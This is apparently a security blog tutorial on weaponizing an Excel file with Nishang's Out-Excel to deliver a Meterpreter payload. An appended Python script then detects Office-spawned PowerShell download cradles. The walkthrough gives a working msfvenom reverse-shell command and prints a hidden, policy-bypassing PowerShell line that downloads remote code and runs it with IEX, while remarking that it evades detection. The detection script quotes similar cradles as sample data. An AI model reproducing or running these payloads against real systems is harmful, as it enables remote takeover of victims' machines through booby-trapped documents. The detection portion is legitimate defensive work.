Nishang has a set of client-side attack scripts designed to weaponize Office documents. Here is a quick demo using Nishang’s PowerShell Cmdlet, Out-Excel, to generate an Excel file that contains code to download and execute a Meterpreter payload. I’m using Kali to generate and serve the payload, and my Windows machine will be playing the role of both attacker and victim for ease of demo.
- On Kali, generate the Meterpreter payload, start a web server, and copy the payload to the web root: msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.201 -f psh-reflection > ps_payload32.ps1
- On Kali, start a listener:
- On your Windows (attacker) machine, import the Nishang module and use the Out-Excel Cmdlet to create a weaponized Excel spreadsheet. If you don’t have Nishang, you can get it here: https://github.com/samratashok/nishang.
Disregard the error message when importing. The Out-Excel Cmdlet generates an Excel file (Salary_Details.xls) and inserts VB code that makes it connect to the server hosting the payload, which is specified in the PayloadURL parameter.
Now, I’ll play the part of the victim and double-click the Salary_Details.xls spreadsheet. The VB code in the spreadsheet starts PowerShell, downloads the payload, and executes it. And then I get my meterpreter:
As of now, nothing gets detected as malware. The payload is running in memory and the Excel file is benign. The payload in the Excel file is just this simple script:
"powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.201/ps_payload32.ps1'));"
As you can see, it invokes PowerShell, passes options that hide the window and attempt to circumvent any execution policy, and then passes a command that downloads the payload from the server. IEX is an alias for the Cmdlet Invoke-Expression, which executes the downloaded string, in this case the PowerShell Meterpreter.
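The detection-side counterpart to that cradle, added here as an example and not part of the original post: it scores process-creation events for an Office application spawning PowerShell and for the cradle's own command-line indicators (hidden window, policy bypass, IEX, WebClient.DownloadString). The Sysmon-style field names and the sample events are constructed assumptions; only the first command line is the one shown above.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style fields).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile "
                    "-c IEX ((New-Object Net.WebClient).DownloadString('http://192.168.0.201/ps_payload32.ps1'));"},
    {"ParentImage": r"C:\Windows\explorer.exe",  # benign admin script, should not alert
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",  # cmd.exe in between
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -ep bypass -c \"iex (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/a.ps1')\""},
]

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}

# Short flag forms are accepted because PowerShell resolves unambiguous prefixes
# (-w hidden, -ep bypass, -nop), a common way to dodge naive string matching.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("bypass_policy", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("webclient_download", re.compile(r"net\.webclient\b.*downloadstring", re.I | re.S)),
]

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def analyze_event(event):
    """Return a finding dict for a suspicious event, or None if it looks benign."""
    cmd = event["CommandLine"]
    hits = [name for name, pat in INDICATORS if pat.search(cmd)]
    parent, child = basename(event["ParentImage"]), basename(event["Image"])
    # Office parent launching PowerShell, directly or via an intermediate shell.
    spawns_shell = child == "powershell.exe" or "powershell" in cmd.lower()
    office_parent = parent in OFFICE_PARENTS and spawns_shell
    # A download cradle needs a download primitive plus something that runs the result.
    cradle = "webclient_download" in hits and "invoke_expression" in hits
    if not (office_parent or cradle):
        return None
    severity = "high" if (office_parent and cradle) else "medium"
    return {"parent": parent, "child": child, "indicators": hits, "severity": severity}

def scan(events):
    return [f for f in (analyze_event(e) for e in events) if f is not None]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The parent-child check is the robust part; the string indicators alone are easy to vary, so treat them as severity boosters rather than the sole trigger.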